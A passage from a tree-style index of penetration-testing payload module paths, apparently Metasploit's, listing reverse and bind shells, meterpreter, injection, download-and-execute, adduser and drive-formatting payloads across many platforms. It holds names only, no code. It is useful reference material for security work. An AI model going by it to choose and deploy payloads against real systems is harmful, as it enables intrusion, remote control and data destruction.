payload/cmd/windows/powershell/shell/reverse_tcp_dns | payload/cmd/windows/powershell/shell/reverse_tcp_rc4 | payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/shell/reverse_tcp_uuid | payload/cmd/windows/powershell/shell/reverse_udp | . | upexec (20) . | payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/upexec/bind_hidden_tcp | payload/cmd/windows/powershell/upexec/bind_ipv6_tcp | payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/upexec/bind_named_pipe | payload/cmd/windows/powershell/upexec/bind_nonx_tcp | payload/cmd/windows/powershell/upexec/bind_tcp | payload/cmd/windows/powershell/upexec/bind_tcp_rc4 | payload/cmd/windows/powershell/upexec/bind_tcp_uuid | payload/cmd/windows/powershell/upexec/find_tag | payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp | payload/cmd/windows/powershell/upexec/reverse_nonx_tcp | payload/cmd/windows/powershell/upexec/reverse_ord_tcp | payload/cmd/windows/powershell/upexec/reverse_tcp | payload/cmd/windows/powershell/upexec/reverse_tcp_allports | payload/cmd/windows/powershell/upexec/reverse_tcp_dns | payload/cmd/windows/powershell/upexec/reverse_tcp_rc4 | payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/upexec/reverse_tcp_uuid | payload/cmd/windows/powershell/upexec/reverse_udp | . | vncinject (23) . | payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/vncinject/bind_hidden_tcp | payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp | payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/vncinject/bind_named_pipe | payload/cmd/windows/powershell/vncinject/bind_nonx_tcp | payload/cmd/windows/powershell/vncinject/bind_tcp | payload/cmd/windows/powershell/vncinject/bind_tcp_rc4 | payload/cmd/windows/powershell/vncinject/bind_tcp_uuid | payload/cmd/windows/powershell/vncinject/find_tag | payload/cmd/windows/powershell/vncinject/reverse_hop_http | payload/cmd/windows/powershell/vncinject/reverse_http | payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore | payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp | payload/cmd/windows/powershell/vncinject/reverse_ord_tcp | payload/cmd/windows/powershell/vncinject/reverse_tcp | payload/cmd/windows/powershell/vncinject/reverse_tcp_allports | payload/cmd/windows/powershell/vncinject/reverse_tcp_dns | payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid | payload/cmd/windows/powershell/vncinject/reverse_winhttp | . | x64 (70) . | custom (14) . | payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/custom/bind_named_pipe | payload/cmd/windows/powershell/x64/custom/bind_tcp | payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid | payload/cmd/windows/powershell/x64/custom/reverse_http | payload/cmd/windows/powershell/x64/custom/reverse_https | payload/cmd/windows/powershell/x64/custom/reverse_named_pipe | payload/cmd/windows/powershell/x64/custom/reverse_tcp | payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid | payload/cmd/windows/powershell/x64/custom/reverse_winhttp | payload/cmd/windows/powershell/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe | payload/cmd/windows/powershell/x64/meterpreter/bind_tcp | payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/powershell/x64/meterpreter/reverse_http | payload/cmd/windows/powershell/x64/meterpreter/reverse_https | payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp | payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp | payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/peinject/bind_named_pipe | payload/cmd/windows/powershell/x64/peinject/bind_tcp | payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid | payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe | payload/cmd/windows/powershell/x64/peinject/reverse_tcp | payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/shell/bind_named_pipe | payload/cmd/windows/powershell/x64/shell/bind_tcp | payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid | payload/cmd/windows/powershell/x64/shell/reverse_tcp | payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe | payload/cmd/windows/powershell/x64/vncinject/bind_tcp | payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/powershell/x64/vncinject/reverse_http | payload/cmd/windows/powershell/x64/vncinject/reverse_https | payload/cmd/windows/powershell/x64/vncinject/reverse_tcp | payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp | payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/powershell/x64/exec | payload/cmd/windows/powershell/x64/loadlibrary | payload/cmd/windows/powershell/x64/messagebox | payload/cmd/windows/powershell/x64/pingback_reverse_tcp | payload/cmd/windows/powershell/x64/powershell_bind_tcp | payload/cmd/windows/powershell/x64/powershell_reverse_tcp | payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/powershell/x64/shell_bind_tcp | payload/cmd/windows/powershell/x64/shell_reverse_tcp | . | payload/cmd/windows/powershell/adduser | payload/cmd/windows/powershell/dns_txt_query_exec | payload/cmd/windows/powershell/download_exec | payload/cmd/windows/powershell/exec | payload/cmd/windows/powershell/format_all_drives | payload/cmd/windows/powershell/loadlibrary | payload/cmd/windows/powershell/messagebox | payload/cmd/windows/powershell/metsvc_bind_tcp | payload/cmd/windows/powershell/metsvc_reverse_tcp | payload/cmd/windows/powershell/pingback_bind_tcp | payload/cmd/windows/powershell/pingback_reverse_tcp | payload/cmd/windows/powershell/powershell_bind_tcp | payload/cmd/windows/powershell/powershell_reverse_tcp | payload/cmd/windows/powershell/powershell_reverse_tcp_ssl | payload/cmd/windows/powershell/shell_bind_tcp | payload/cmd/windows/powershell/shell_bind_tcp_xpfw | payload/cmd/windows/powershell/shell_hidden_bind_tcp | payload/cmd/windows/powershell/shell_reverse_tcp | payload/cmd/windows/powershell/speak_pwned | . | python (18) . | meterpreter (7) . | payload/cmd/windows/python/meterpreter/bind_tcp | payload/cmd/windows/python/meterpreter/bind_tcp_uuid | payload/cmd/windows/python/meterpreter/reverse_http | payload/cmd/windows/python/meterpreter/reverse_https | payload/cmd/windows/python/meterpreter/reverse_tcp | payload/cmd/windows/python/meterpreter/reverse_tcp_ssl | payload/cmd/windows/python/meterpreter/reverse_tcp_uuid | . | payload/cmd/windows/python/meterpreter_bind_tcp | payload/cmd/windows/python/meterpreter_reverse_http | payload/cmd/windows/python/meterpreter_reverse_https | payload/cmd/windows/python/meterpreter_reverse_tcp | payload/cmd/windows/python/pingback_bind_tcp | payload/cmd/windows/python/pingback_reverse_tcp | payload/cmd/windows/python/shell_bind_tcp | payload/cmd/windows/python/shell_reverse_sctp | payload/cmd/windows/python/shell_reverse_tcp | payload/cmd/windows/python/shell_reverse_tcp_ssl | payload/cmd/windows/python/shell_reverse_udp | . | smb (77) . | x64 (77) . | custom (14) . | payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp | payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/custom/bind_named_pipe | payload/cmd/windows/smb/x64/custom/bind_tcp | payload/cmd/windows/smb/x64/custom/bind_tcp_rc4 | payload/cmd/windows/smb/x64/custom/bind_tcp_uuid | payload/cmd/windows/smb/x64/custom/reverse_http | payload/cmd/windows/smb/x64/custom/reverse_https | payload/cmd/windows/smb/x64/custom/reverse_named_pipe | payload/cmd/windows/smb/x64/custom/reverse_tcp | payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid | payload/cmd/windows/smb/x64/custom/reverse_winhttp | payload/cmd/windows/smb/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe | payload/cmd/windows/smb/x64/meterpreter/bind_tcp | payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/smb/x64/meterpreter/reverse_http | payload/cmd/windows/smb/x64/meterpreter/reverse_https | payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/smb/x64/meterpreter/reverse_tcp | payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp | payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/peinject/bind_named_pipe | payload/cmd/windows/smb/x64/peinject/bind_tcp | payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid | payload/cmd/windows/smb/x64/peinject/reverse_named_pipe | payload/cmd/windows/smb/x64/peinject/reverse_tcp | payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp | payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/shell/bind_named_pipe | payload/cmd/windows/smb/x64/shell/bind_tcp | payload/cmd/windows/smb/x64/shell/bind_tcp_rc4 | payload/cmd/windows/smb/x64/shell/bind_tcp_uuid | payload/cmd/windows/smb/x64/shell/reverse_tcp | payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/vncinject/bind_named_pipe | payload/cmd/windows/smb/x64/vncinject/bind_tcp | payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/smb/x64/vncinject/reverse_http | payload/cmd/windows/smb/x64/vncinject/reverse_https | payload/cmd/windows/smb/x64/vncinject/reverse_tcp | payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/smb/x64/vncinject/reverse_winhttp | payload/cmd/windows/smb/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/smb/x64/exec | payload/cmd/windows/smb/x64/loadlibrary | payload/cmd/windows/smb/x64/messagebox | payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe | payload/cmd/windows/smb/x64/meterpreter_bind_tcp | payload/cmd/windows/smb/x64/meterpreter_reverse_http | payload/cmd/windows/smb/x64/meterpreter_reverse_https | payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/smb/x64/meterpreter_reverse_tcp | payload/cmd/windows/smb/x64/pingback_reverse_tcp | payload/cmd/windows/smb/x64/powershell_bind_tcp | payload/cmd/windows/smb/x64/powershell_reverse_tcp | payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/smb/x64/shell_bind_tcp | payload/cmd/windows/smb/x64/shell_reverse_tcp | . | . | tftp (77) . | x64 (77) . | custom (14) . | payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/custom/bind_named_pipe | payload/cmd/windows/tftp/x64/custom/bind_tcp | payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid | payload/cmd/windows/tftp/x64/custom/reverse_http | payload/cmd/windows/tftp/x64/custom/reverse_https | payload/cmd/windows/tftp/x64/custom/reverse_named_pipe | payload/cmd/windows/tftp/x64/custom/reverse_tcp | payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid | payload/cmd/windows/tftp/x64/custom/reverse_winhttp | payload/cmd/windows/tftp/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe | payload/cmd/windows/tftp/x64/meterpreter/bind_tcp | payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/tftp/x64/meterpreter/reverse_http | payload/cmd/windows/tftp/x64/meterpreter/reverse_https | payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp | payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp | payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/peinject/bind_named_pipe | payload/cmd/windows/tftp/x64/peinject/bind_tcp | payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid | payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe | payload/cmd/windows/tftp/x64/peinject/reverse_tcp | payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/shell/bind_named_pipe | payload/cmd/windows/tftp/x64/shell/bind_tcp | payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid | payload/cmd/windows/tftp/x64/shell/reverse_tcp | payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe | payload/cmd/windows/tftp/x64/vncinject/bind_tcp | payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/tftp/x64/vncinject/reverse_http | payload/cmd/windows/tftp/x64/vncinject/reverse_https | payload/cmd/windows/tftp/x64/vncinject/reverse_tcp | payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp | payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/tftp/x64/exec | payload/cmd/windows/tftp/x64/loadlibrary | payload/cmd/windows/tftp/x64/messagebox | payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe | payload/cmd/windows/tftp/x64/meterpreter_bind_tcp | payload/cmd/windows/tftp/x64/meterpreter_reverse_http | payload/cmd/windows/tftp/x64/meterpreter_reverse_https | payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp | payload/cmd/windows/tftp/x64/pingback_reverse_tcp | payload/cmd/windows/tftp/x64/powershell_bind_tcp | payload/cmd/windows/tftp/x64/powershell_reverse_tcp | payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/tftp/x64/shell_bind_tcp | payload/cmd/windows/tftp/x64/shell_reverse_tcp | . | . | payload/cmd/windows/adduser | payload/cmd/windows/bind_lua | payload/cmd/windows/bind_perl | payload/cmd/windows/bind_perl_ipv6 | payload/cmd/windows/bind_ruby | payload/cmd/windows/download_eval_vbs | payload/cmd/windows/download_exec_vbs | payload/cmd/windows/generic | payload/cmd/windows/jjs_reverse_tcp | payload/cmd/windows/powershell_bind_tcp | payload/cmd/windows/powershell_reverse_tcp | payload/cmd/windows/powershell_reverse_tcp_ssl | payload/cmd/windows/reverse_lua | payload/cmd/windows/reverse_perl | payload/cmd/windows/reverse_powershell | payload/cmd/windows/reverse_ruby | . | . | firefox (3) . | payload/firefox/exec | payload/firefox/shell_bind_tcp | payload/firefox/shell_reverse_tcp | . | generic (7) . | ssh (1) . | payload/generic/ssh/interact | . | payload/generic/custom | payload/generic/debug_trap | payload/generic/shell_bind_aws_ssm | payload/generic/shell_bind_tcp | payload/generic/shell_reverse_tcp | payload/generic/tight_loop | . | java (9) . | meterpreter (4) . | payload/java/meterpreter/bind_tcp | payload/java/meterpreter/reverse_http | payload/java/meterpreter/reverse_https | payload/java/meterpreter/reverse_tcp | . | shell (2) . | payload/java/shell/bind_tcp | payload/java/shell/reverse_tcp | . | payload/java/jsp_shell_bind_tcp | payload/java/jsp_shell_reverse_tcp | payload/java/shell_reverse_tcp | . | linux (114) . | aarch64 (6) . | meterpreter (1) . | payload/linux/aarch64/meterpreter/reverse_tcp | . | shell (1) . | payload/linux/aarch64/shell/reverse_tcp | . | payload/linux/aarch64/meterpreter_reverse_http | payload/linux/aarch64/meterpreter_reverse_https | payload/linux/aarch64/meterpreter_reverse_tcp | payload/linux/aarch64/shell_reverse_tcp | . | armbe (4) . | payload/linux/armbe/meterpreter_reverse_http | payload/linux/armbe/meterpreter_reverse_https | payload/linux/armbe/meterpreter_reverse_tcp | payload/linux/armbe/shell_bind_tcp | . | armle (11) . | meterpreter (2) . | payload/linux/armle/meterpreter/bind_tcp | payload/linux/armle/meterpreter/reverse_tcp | . | shell (2) . | payload/linux/armle/shell/bind_tcp | payload/linux/armle/shell/reverse_tcp | . | payload/linux/armle/adduser | payload/linux/armle/exec | payload/linux/armle/meterpreter_reverse_http | payload/linux/armle/meterpreter_reverse_https | payload/linux/armle/meterpreter_reverse_tcp | payload/linux/armle/shell_bind_tcp | payload/linux/armle/shell_reverse_tcp | . | mips64 (3) . | payload/linux/mips64/meterpreter_reverse_http | payload/linux/mips64/meterpreter_reverse_https | payload/linux/mips64/meterpreter_reverse_tcp | . | mipsbe (9) . | meterpreter (1) . | payload/linux/mipsbe/meterpreter/reverse_tcp | . | shell (1) . | payload/linux/mipsbe/shell/reverse_tcp | . | payload/linux/mipsbe/exec | payload/linux/mipsbe/meterpreter_reverse_http | payload/linux/mipsbe/meterpreter_reverse_https | payload/linux/mipsbe/meterpreter_reverse_tcp | payload/linux/mipsbe/reboot | payload/linux/mipsbe/shell_bind_tcp | payload/linux/mipsbe/shell_reverse_tcp | . | mipsle (9) . | meterpreter (1) . | payload/linux/mipsle/meterpreter/reverse_tcp | . | shell (1) . | payload/linux/mipsle/shell/reverse_tcp | . | payload/linux/mipsle/exec | payload/linux/mipsle/meterpreter_reverse_http | payload/linux/mipsle/meterpreter_reverse_https | payload/linux/mipsle/meterpreter_reverse_tcp | payload/linux/mipsle/reboot | payload/linux/mipsle/shell_bind_tcp | payload/linux/mipsle/shell_reverse_tcp | . | ppc (6) . | payload/linux/ppc/meterpreter_reverse_http | payload/linux/ppc/meterpreter_reverse_https | payload/linux/ppc/meterpreter_reverse_tcp | payload/linux/ppc/shell_bind_tcp | payload/linux/ppc/shell_find_port | payload/linux/ppc/shell_reverse_tcp | . | ppc64 (3) . | payload/linux/ppc64/shell_bind_tcp | payload/linux/ppc64/shell_find_port | payload/linux/ppc64/shell_reverse_tcp | . | ppc64le (3) . | payload/linux/ppc64le/meterpreter_reverse_http | payload/linux/ppc64le/meterpreter_reverse_https | payload/linux/ppc64le/meterpreter_reverse_tcp | . | ppce500v2 (3) . | payload/linux/ppce500v2/meterpreter_reverse_http | payload/linux/ppce500v2/meterpreter_reverse_https | payload/linux/ppce500v2/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/linux/x64/meterpreter/bind_tcp | payload/linux/x64/meterpreter/reverse_sctp | payload/linux/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/linux/x64/shell/bind_tcp | payload/linux/x64/shell/reverse_sctp | payload/linux/x64/shell/reverse_tcp | . | payload/linux/x64/exec | payload/linux/x64/meterpreter_reverse_http | payload/linux/x64/meterpreter_reverse_https | payload/linux/x64/meterpreter_reverse_tcp | payload/linux/x64/pingback_bind_tcp | payload/linux/x64/pingback_reverse_tcp | payload/linux/x64/shell_bind_ipv6_tcp | payload/linux/x64/shell_bind_tcp | payload/linux/x64/shell_bind_tcp_random_port | payload/linux/x64/shell_find_port | payload/linux/x64/shell_reverse_ipv6_tcp | payload/linux/x64/shell_reverse_tcp | . | x86 (36) . | meterpreter (10) . | payload/linux/x86/meterpreter/bind_ipv6_tcp | payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid | payload/linux/x86/meterpreter/bind_nonx_tcp | payload/linux/x86/meterpreter/bind_tcp | payload/linux/x86/meterpreter/bind_tcp_uuid | payload/linux/x86/meterpreter/find_tag | payload/linux/x86/meterpreter/reverse_ipv6_tcp | payload/linux/x86/meterpreter/reverse_nonx_tcp | payload/linux/x86/meterpreter/reverse_tcp | payload/linux/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/linux/x86/shell/bind_ipv6_tcp | payload/linux/x86/shell/bind_ipv6_tcp_uuid | payload/linux/x86/shell/bind_nonx_tcp | payload/linux/x86/shell/bind_tcp | payload/linux/x86/shell/bind_tcp_uuid | payload/linux/x86/shell/find_tag | payload/linux/x86/shell/reverse_ipv6_tcp | payload/linux/x86/shell/reverse_nonx_tcp | payload/linux/x86/shell/reverse_tcp | payload/linux/x86/shell/reverse_tcp_uuid | . | payload/linux/x86/adduser | payload/linux/x86/chmod | payload/linux/x86/exec | payload/linux/x86/meterpreter_reverse_http | payload/linux/x86/meterpreter_reverse_https | payload/linux/x86/meterpreter_reverse_tcp | payload/linux/x86/metsvc_bind_tcp | payload/linux/x86/metsvc_reverse_tcp | payload/linux/x86/read_file | payload/linux/x86/shell_bind_ipv6_tcp | payload/linux/x86/shell_bind_tcp | payload/linux/x86/shell_bind_tcp_random_port | payload/linux/x86/shell_find_port | payload/linux/x86/shell_find_tag | payload/linux/x86/shell_reverse_tcp | payload/linux/x86/shell_reverse_tcp_ipv6 | . | zarch (3) . | payload/linux/zarch/meterpreter_reverse_http | payload/linux/zarch/meterpreter_reverse_https | payload/linux/zarch/meterpreter_reverse_tcp | . | . | mainframe (1) . | payload/mainframe/shell_reverse_tcp | . | multi (2) . | meterpreter (2) . | payload/multi/meterpreter/reverse_http | payload/multi/meterpreter/reverse_https | . | . | netware (1) . | shell (1) . | payload/netware/shell/reverse_tcp | . | . | nodejs (3) . | payload/nodejs/shell_bind_tcp | payload/nodejs/shell_reverse_tcp | payload/nodejs/shell_reverse_tcp_ssl | . | osx (45) . | aarch64 (7) . | meterpreter (1) . | payload/osx/aarch64/meterpreter/reverse_tcp | . | payload/osx/aarch64/exec | payload/osx/aarch64/meterpreter_reverse_http | payload/osx/aarch64/meterpreter_reverse_https | payload/osx/aarch64/meterpreter_reverse_tcp | payload/osx/aarch64/shell_bind_tcp | payload/osx/aarch64/shell_reverse_tcp | . | armle (7) . | execute (2) . | payload/osx/armle/execute/bind_tcp | payload/osx/armle/execute/reverse_tcp | . | shell (2) . | payload/osx/armle/shell/bind_tcp | payload/osx/armle/shell/reverse_tcp | . | payload/osx/armle/shell_bind_tcp | payload/osx/armle/shell_reverse_tcp | payload/osx/armle/vibrate | . | ppc (5) . | shell (3) . | payload/osx/ppc/shell/bind_tcp | payload/osx/ppc/shell/find_tag | payload/osx/ppc/shell/reverse_tcp | . | payload/osx/ppc/shell_bind_tcp | payload/osx/ppc/shell_reverse_tcp | . | x64 (14) . | dupandexecve (3) . | payload/osx/x64/dupandexecve/bind_tcp | payload/osx/x64/dupandexecve/reverse_tcp | payload/osx/x64/dupandexecve/reverse_tcp_uuid | . | meterpreter (3) . | payload/osx/x64/meterpreter/bind_tcp | payload/osx/x64/meterpreter/reverse_tcp | payload/osx/x64/meterpreter/reverse_tcp_uuid | . | payload/osx/x64/exec | payload/osx/x64/meterpreter_reverse_http | payload/osx/x64/meterpreter_reverse_https | payload/osx/x64/meterpreter_reverse_tcp | payload/osx/x64/say | payload/osx/x64/shell_bind_tcp | payload/osx/x64/shell_find_tag | payload/osx/x64/shell_reverse_tcp | . | x86 (12) . | bundleinject (2) . | payload/osx/x86/bundleinject/bind_tcp | payload/osx/x86/bundleinject/reverse_tcp | . | isight (2) . | payload/osx/x86/isight/bind_tcp | payload/osx/x86/isight/reverse_tcp | . | vforkshell (2) . | payload/osx/x86/vforkshell/bind_tcp | payload/osx/x86/vforkshell/reverse_tcp | . | payload/osx/x86/exec | payload/osx/x86/shell_bind_tcp | payload/osx/x86/shell_find_port | payload/osx/x86/shell_reverse_tcp | payload/osx/x86/vforkshell_bind_tcp | payload/osx/x86/vforkshell_reverse_tcp | . | . | php (16) . | meterpreter (6) . | payload/php/meterpreter/bind_tcp | payload/php/meterpreter/bind_tcp_ipv6 | payload/php/meterpreter/bind_tcp_ipv6_uuid | payload/php/meterpreter/bind_tcp_uuid | payload/php/meterpreter/reverse_tcp | payload/php/meterpreter/reverse_tcp_uuid | . | payload/php/bind_perl | payload/php/bind_perl_ipv6 | payload/php/bind_php | payload/php/bind_php_ipv6 | payload/php/download_exec | payload/php/exec | payload/php/meterpreter_reverse_tcp | payload/php/reverse_perl | payload/php/reverse_php | payload/php/shell_findsock | . | python (18) . | meterpreter (7) . | payload/python/meterpreter/bind_tcp | payload/python/meterpreter/bind_tcp_uuid | payload/python/meterpreter/reverse_http | payload/python/meterpreter/reverse_https | payload/python/meterpreter/reverse_tcp | payload/python/meterpreter/reverse_tcp_ssl | payload/python/meterpreter/reverse_tcp_uuid | . | payload/python/meterpreter_bind_tcp | payload/python/meterpreter_reverse_http | payload/python/meterpreter_reverse_https | payload/python/meterpreter_reverse_tcp | payload/python/pingback_bind_tcp | payload/python/pingback_reverse_tcp | payload/python/shell_bind_tcp | payload/python/shell_reverse_sctp | payload/python/shell_reverse_tcp | payload/python/shell_reverse_tcp_ssl | payload/python/shell_reverse_udp | . | r (2) . | payload/r/shell_bind_tcp | payload/r/shell_reverse_tcp | . | ruby (6) . | payload/ruby/pingback_bind_tcp | payload/ruby/pingback_reverse_tcp | payload/ruby/shell_bind_tcp | payload/ruby/shell_bind_tcp_ipv6 | payload/ruby/shell_reverse_tcp | payload/ruby/shell_reverse_tcp_ssl | . | solaris (6) . | sparc (3) . | payload/solaris/sparc/shell_bind_tcp | payload/solaris/sparc/shell_find_port | 